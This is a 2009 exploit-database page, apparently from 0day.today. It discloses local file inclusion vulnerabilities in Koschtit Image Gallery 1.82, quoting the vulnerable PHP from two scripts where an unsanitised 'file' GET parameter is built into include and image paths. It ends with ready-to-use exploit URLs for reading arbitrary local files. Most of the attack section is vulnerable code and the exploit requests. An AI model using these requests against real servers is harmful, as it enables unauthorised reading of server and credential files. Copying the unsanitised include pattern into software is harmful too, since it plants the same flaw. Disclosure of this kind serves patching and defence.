[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities

Author
ahmadbady
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4986
Category
web applications
Date add
31-03-2009
Platform
unsorted
=========================================================================
Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities
=========================================================================


                      :local file include:
   
#############################
script: koschtit_image_gallery(v1.82)
   
##############################################################
download from:http://koschtit..tabere.net/download/
or http://koschtit.tabere.net/en/#getit 
   
##############################################################
vul:/ki_base/ki_makepic.php


if(isset($_GET['file'])) 
 $file = "../ki_galleries/".$_GET['file'];
else
 exit();

$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));
if(is_file("../ki_config/".$gallery."_ki_setup.php"))
 include_once("../ki_config/".$gallery."_ki_setup.php");

$imgsize = getimagesize($file); 

#############
vul:/ki_base/ki_nojsdisplayimage.php

$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));

include_once("../ki_config/ki_setup.php");
if(is_file(".../ki_config/".$gallery."_ki_setup.php")){
 include_once("../ki_config/".$gallery."_ki_setup.php");
}
.
.
$srcfile = "../ki_galleries/".$file;
$imgsize = getimagesize("../ki_galleries/".$file);

##############################################################
xpl:
path/ki_base/ki_makepic.php?file=[local_file]
path/ki_base/ki_nojsdisplayimage.php?file=[local_file]  
------------------------------------------------------------




#  0day.today [2024-12-24]  #